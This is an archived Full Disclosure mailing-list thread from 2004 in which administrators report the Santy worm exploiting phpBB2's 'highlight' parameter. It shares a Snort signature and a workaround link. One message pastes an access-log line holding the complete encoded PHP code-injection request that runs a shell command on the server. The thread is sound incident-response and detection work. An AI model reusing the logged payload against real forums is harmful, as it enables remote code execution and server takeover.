Full Disclosure mailing list archives
RE: Worm hitting PHPbb2 Forums
From: "Mattias R. Lindgren" <mailinglists () mattiaslindgren com>
Date: Wed, 22 Dec 2004 22:51:40 -0700
There is a workaround posted http://forums.ir0x0rz.com/viewtopic.php?t=34 I'm hoping this will be enough to protect phpBB installs. ~M -----Original Message----- From: M. Shirk [mailto:shirkdog_list () hotmail com] Sent: Tuesday, December 21, 2004 5:53 PM To: incidents () securityfocus com Cc: full-disclosure () lists netsys com Subject: RE: Worm hitting PHPbb2 Forums I missed an important "F" on my previous post for these snort sigs. alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999; rev:1;) Shirkdog http://www.shirkdog.us
From: "Mike" <mike_sha () shaw ca> To: <mark () onnow net>, "L. Walker" <lwalker () magi net au> CC: <incidents () securityfocus com>, <full-disclosure () lists netsys com> Subject: RE: Worm hitting PHPbb2 Forums Date: Tue, 21 Dec 2004 13:28:27 -0500 Does this affect PHPBB2 in general, or is it platform specific as well? Mike Fetherston-----Original Message----- From: mark () onnow net [mailto:mark () onnow net] Sent: Tuesday, December 21, 2004 12:47 PM To: L. Walker Cc: incidents () securityfocus com; full-disclosure () lists netsys com Subject: Re: Worm hitting PHPbb2 Forums Front what I have read, this can happen in any phpbb version lowerthan2.0.11 This exploit is becoming frequent. Normally uploading a ddos bot. Mark Quoting "L. Walker" <lwalker () magi net au>:Just spotted two clients hit by this. One client didnt update his software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation16.Chkrootkit says its Adore, however could be something else.Datacenterwasn't very smart and has since wiped the server, so no binaries orotherevidence. Generation 12 only wiped out PHP files, replacing them with its own message on other client's PHPbb2 forum. Access logs show: 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlig ht=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252ech r(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252ech r(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252ec hr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252ec hr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252 echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252 echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)% 252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)% 252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106 )%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78 )%252echr(41)%252echr(34))%252e%2527HTTP/1.0" 200 270"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5 aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252ech r(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252ec hr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252 echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252e chr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252 echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%25 2echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110) %252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89) %252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(12 2)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(9 7)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" -- L. Walker <lwalker at magi dot net dot au> Network Administrator / Consultant ------------------------------------------------------------------ This message was sent using IMP, the Internet Messaging Program.
_________________________________________________________________ FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
Attachment:
smime.p7s
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Worm hitting PHPbb2 Forums David Devault (Dec 21)
- <Possible follow-ups>
- RE: Worm hitting PHPbb2 Forums Christopher Adickes (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mike (Dec 22)
- RE: Worm hitting PHPbb2 Forums M. Shirk (Dec 21)
- Re: RE: Worm hitting PHPbb2 Forums Willem Koenings (Dec 22)
- RE: RE: Worm hitting PHPbb2 Forums Patrick Nolan (Dec 23)
- RE: RE: Worm hitting PHPbb2 Forums Paul Laudanski (Dec 23)
- Re: Worm hitting PHPbb2 Forums mark (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mattias R. Lindgren (Dec 23)